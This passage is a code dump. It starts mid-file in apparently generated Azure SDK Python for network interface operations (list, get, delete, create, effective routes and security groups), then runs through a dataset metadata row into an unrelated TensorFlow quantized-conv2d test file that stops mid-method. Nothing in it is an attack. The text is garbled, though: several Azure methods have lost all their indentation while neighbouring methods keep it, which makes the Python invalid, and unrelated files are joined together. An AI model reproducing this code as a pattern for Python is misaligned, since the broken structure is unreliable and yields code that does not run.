header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'}
    def list_virtual_machine_scale_set_network_interfaces(
        self,
        resource_group_name,
        virtual_machine_scale_set_name,
        **kwargs
    ):
        """List all network interfaces in a virtual machine scale set.

        Results are fetched lazily, one ``NetworkInterfaceListResult`` page
        per GET, and surfaced as a flat iterator of ``NetworkInterface``.

        :param resource_group_name: Name of the resource group.
        :type resource_group_name: str
        :param virtual_machine_scale_set_name: Name of the virtual machine
         scale set.
        :type virtual_machine_scale_set_name: str
        :keyword cls: Optional callable applied to each page's element list
         before it is yielded.
        :keyword error_map: Extra status-code -> exception mappings merged
         over the defaults below.
        :return: Paged iterator of network interfaces.
        :rtype: ~azure.core.paging.ItemPaged
        :raises ~azure.core.exceptions.HttpResponseError: on any non-200 page
         response.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        # First request is built from the URL template; follow-up requests use
        # the service-supplied next_link verbatim (no path/query rebuilding).
        def prepare_request(next_link=None):
            header_parameters = {}
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url']
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        # Splits one page into (continuation token, iterator of elements).
        def extract_data(pipeline_response):
            deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'}
    def get_virtual_machine_scale_set_network_interface(
        self,
        resource_group_name,
        virtual_machine_scale_set_name,
        virtualmachine_index,
        network_interface_name,
        expand=None,
        **kwargs
    ):
        """Get the specified network interface in a virtual machine scale set.

        :param resource_group_name: Name of the resource group.
        :type resource_group_name: str
        :param virtual_machine_scale_set_name: Name of the virtual machine
         scale set.
        :type virtual_machine_scale_set_name: str
        :param virtualmachine_index: Index of the virtual machine within the
         scale set.
        :type virtualmachine_index: str
        :param network_interface_name: Name of the network interface.
        :type network_interface_name: str
        :param expand: Optional ``$expand`` expression applied to the
         operation; omitted from the query string when None.
        :type expand: str
        :keyword cls: Optional callable used to customize the returned value;
         receives ``(pipeline_response, deserialized, response_headers)``.
        :return: The deserialized NetworkInterface.
        :raises ~azure.core.exceptions.HttpResponseError: on any non-200
         response.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        url = self.get_virtual_machine_scale_set_network_interface.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
            'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
            'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
        header_parameters = {}
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('NetworkInterface', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'}
def _delete_initial(
self,
resource_group_name,
network_interface_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
url = self._delete_initial.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
    def begin_delete(
        self,
        resource_group_name,
        network_interface_name,
        **kwargs
    ):
        """Delete the specified network interface (long-running operation).

        :param resource_group_name: Name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: Name of the network interface.
        :type network_interface_name: str
        :keyword polling: True (default) selects ARM polling, False disables
         polling, or pass a custom polling-method object.
        :keyword continuation_token: Token from a previous poller to resume an
         in-flight operation without re-issuing the initial request.
        :keyword cls: Optional callable used to customize the final result.
        :return: A poller whose result is None on completion.
        :rtype: ~azure.core.polling.LROPoller
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            raw_result = self._delete_initial(
                resource_group_name=resource_group_name,
                network_interface_name=network_interface_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # These keywords were consumed by the initial call above; drop them so
        # they are not forwarded again to the polling requests.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            if cls:
                return cls(pipeline_response, None, {})
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
def get(
self,
resource_group_name,
network_interface_name,
expand=None,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
def _create_or_update_initial(
self,
resource_group_name,
network_interface_name,
parameters,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
url = self._create_or_update_initial.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {}
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
    def begin_create_or_update(
        self,
        resource_group_name,
        network_interface_name,
        parameters,
        **kwargs
    ):
        """Create or update a network interface (long-running operation).

        :param resource_group_name: Name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: Name of the network interface.
        :type network_interface_name: str
        :param parameters: NetworkInterface model supplied to the create or
         update operation.
        :keyword polling: True (default) selects ARM polling, False disables
         polling, or pass a custom polling-method object.
        :keyword continuation_token: Token from a previous poller to resume an
         in-flight operation without re-issuing the initial request.
        :keyword cls: Optional callable used to customize the final result.
        :return: A poller whose result is the deserialized NetworkInterface.
        :rtype: ~azure.core.polling.LROPoller
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # cls=lambda keeps the raw PipelineResponse so the poller can
            # inspect the initial response's status and headers.
            raw_result = self._create_or_update_initial(
                resource_group_name=resource_group_name,
                network_interface_name=network_interface_name,
                parameters=parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Consumed by the initial call; do not forward to polling requests.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('NetworkInterface', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}
    def list_all(
        self,
        **kwargs
    ):
        """List all network interfaces in the subscription.

        :keyword cls: Optional callable applied to each page's element list
         before it is yielded.
        :keyword error_map: Extra status-code -> exception mappings merged
         over the defaults below.
        :return: Paged iterator of network interfaces, fetched lazily one
         ``NetworkInterfaceListResult`` page at a time.
        :rtype: ~azure.core.paging.ItemPaged
        :raises ~azure.core.exceptions.HttpResponseError: on any non-200 page
         response.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        # First request uses the URL template; follow-ups use next_link as-is.
        def prepare_request(next_link=None):
            header_parameters = {}
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                url = self.list_all.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        # Splits one page into (continuation token, iterator of elements).
        def extract_data(pipeline_response):
            deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'}
    def list(
        self,
        resource_group_name,
        **kwargs
    ):
        """List all network interfaces in a resource group.

        :param resource_group_name: Name of the resource group.
        :type resource_group_name: str
        :keyword cls: Optional callable applied to each page's element list
         before it is yielded.
        :keyword error_map: Extra status-code -> exception mappings merged
         over the defaults below.
        :return: Paged iterator of network interfaces, fetched lazily one
         ``NetworkInterfaceListResult`` page at a time.
        :rtype: ~azure.core.paging.ItemPaged
        :raises ~azure.core.exceptions.HttpResponseError: on any non-200 page
         response.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        # First request uses the URL template; follow-ups use next_link as-is.
        def prepare_request(next_link=None):
            header_parameters = {}
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                url = self.list.metadata['url']
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        # Splits one page into (continuation token, iterator of elements).
        def extract_data(pipeline_response):
            deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'}
    def _get_effective_route_table_initial(
        self,
        resource_group_name,
        network_interface_name,
        **kwargs
    ):
        """Issue the single POST backing :meth:`begin_get_effective_route_table`.

        Returns the deserialized ``EffectiveRouteListResult`` on 200, or None
        on 202 (the service is still computing the result and the poller will
        follow up). Any other status raises ``HttpResponseError``.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        url = self._get_effective_route_table_initial.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        header_parameters = {}
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.post(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # Only a 200 carries a body; a 202 leaves deserialized as None.
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'}
    def begin_get_effective_route_table(
        self,
        resource_group_name,
        network_interface_name,
        **kwargs
    ):
        """Get all route tables applied to a network interface (long-running).

        :param resource_group_name: Name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: Name of the network interface.
        :type network_interface_name: str
        :keyword polling: True (default) selects ARM polling, False disables
         polling, or pass a custom polling-method object.
        :keyword continuation_token: Token from a previous poller to resume an
         in-flight operation without re-issuing the initial request.
        :keyword cls: Optional callable used to customize the final result.
        :return: A poller whose result is the deserialized
         EffectiveRouteListResult.
        :rtype: ~azure.core.polling.LROPoller
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # cls=lambda keeps the raw PipelineResponse for the poller.
            raw_result = self._get_effective_route_table_initial(
                resource_group_name=resource_group_name,
                network_interface_name=network_interface_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Consumed by the initial call; do not forward to polling requests.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'}
def _list_effective_network_security_groups_initial(
self,
resource_group_name,
network_interface_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
url = self._list_effective_network_security_groups_initial.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'}
    def begin_list_effective_network_security_groups(
        self,
        resource_group_name,
        network_interface_name,
        **kwargs
    ):
        """List all network security groups applied to a network interface
        (long-running operation).

        :param resource_group_name: Name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: Name of the network interface.
        :type network_interface_name: str
        :keyword polling: True (default) selects ARM polling, False disables
         polling, or pass a custom polling-method object.
        :keyword continuation_token: Token from a previous poller to resume an
         in-flight operation without re-issuing the initial request.
        :keyword cls: Optional callable used to customize the final result.
        :return: A poller whose result is the deserialized
         EffectiveNetworkSecurityGroupListResult.
        :rtype: ~azure.core.polling.LROPoller
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # cls=lambda keeps the raw PipelineResponse for the poller.
            raw_result = self._list_effective_network_security_groups_initial(
                resource_group_name=resource_group_name,
                network_interface_name=network_interface_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Consumed by the initial call; do not forward to polling requests.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'}
| true | true |
f7fa264461ee7a1a80d8e7c0cf7d71c4d23225bf | 7,521 | py | Python | tensorflow/python/ops/quantized_conv_ops_test.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 52 | 2018-11-12T06:39:35.000Z | 2022-03-08T05:31:27.000Z | tensorflow/python/ops/quantized_conv_ops_test.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 2 | 2018-12-04T08:35:40.000Z | 2020-10-22T16:17:39.000Z | tensorflow/python/ops/quantized_conv_ops_test.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 17 | 2019-03-11T01:17:16.000Z | 2022-02-21T00:44:47.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for quantized convolutional operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import test
class Conv2DTest(test.TestCase):
  """Tests quantized_conv2d against hand-computed reference values.

  Inputs and filters are uint8 counting sequences (1, 2, 3, ...) quantized
  over [0, 255]; the qint32 output is dequantized back to float and compared
  against expected totals computed by hand in the per-test comments.
  """

  def __init__(self, method_name="runTest"):
    super(Conv2DTest, self).__init__(method_name)
  def _VerifyValues(self, tensor_in_sizes, filter_in_sizes, stride, padding,
                    expected):
    """Verifies the output values of the convolution function.
    Args:
      tensor_in_sizes: Input tensor dimensions in
        [batch, input_rows, input_cols, input_depth].
      filter_in_sizes: Filter tensor dimensions in
        [kernel_rows, kernel_cols, input_depth, output_depth].
      stride: Stride.
      padding: Padding type.
      expected: An array containing the expected operation outputs.
    """
    total_size_1 = 1
    total_size_2 = 1
    for s in tensor_in_sizes:
      total_size_1 *= s
    for s in filter_in_sizes:
      total_size_2 *= s
    # Initializes the input tensor with array containing incrementing
    # numbers from 1.
    x1 = np.array([f for f in range(1, total_size_1 + 1)])
    x1 = x1.astype(np.uint8).reshape(tensor_in_sizes)
    x1_min = 0.0
    x1_max = 255.0
    # (The second astype below is redundant with this one; harmless.)
    x2 = np.array([f for f in range(1, total_size_2 + 1)]).astype(np.uint8)
    x2 = x2.astype(np.uint8).reshape(filter_in_sizes)
    x2_min = 0.0
    x2_max = 255.0
    with self.cached_session(use_gpu=False) as sess:
      t1 = constant_op.constant(x1, shape=tensor_in_sizes, dtype=dtypes.quint8)
      t2 = constant_op.constant(x2, shape=filter_in_sizes, dtype=dtypes.quint8)
      conv = nn_ops.quantized_conv2d(
          t1,
          t2,
          out_type=dtypes.qint32,
          strides=[1, stride, stride, 1],
          padding=padding,
          min_input=x1_min,
          max_input=x1_max,
          min_filter=x2_min,
          max_filter=x2_max)
      value = sess.run(conv)
      # The op returns (quantized output, output_min, output_max).
      quantized_output = value[0]
      output_min = value[1]
      output_max = value[2]
      float_output = self._QuantizedOutputToFloat(quantized_output, output_min,
                                                  output_max)
      # Tolerance of 1.0 absorbs quantization rounding error.
      self.assertArrayNear(expected, float_output.flatten(), 1.0)
      self.assertEqual(value[0].shape, conv[0].get_shape())
  def _assertQuantizedArrayEquals(self, iarray1, iarray2):
    """Asserts two integer sequences are element-wise equal."""
    for i1, i2 in zip(iarray1, iarray2):
      self.assertTrue(i1 == i2)
  def _QuantizedOutputToFloat(self, quantized, quantized_min, quantized_max):
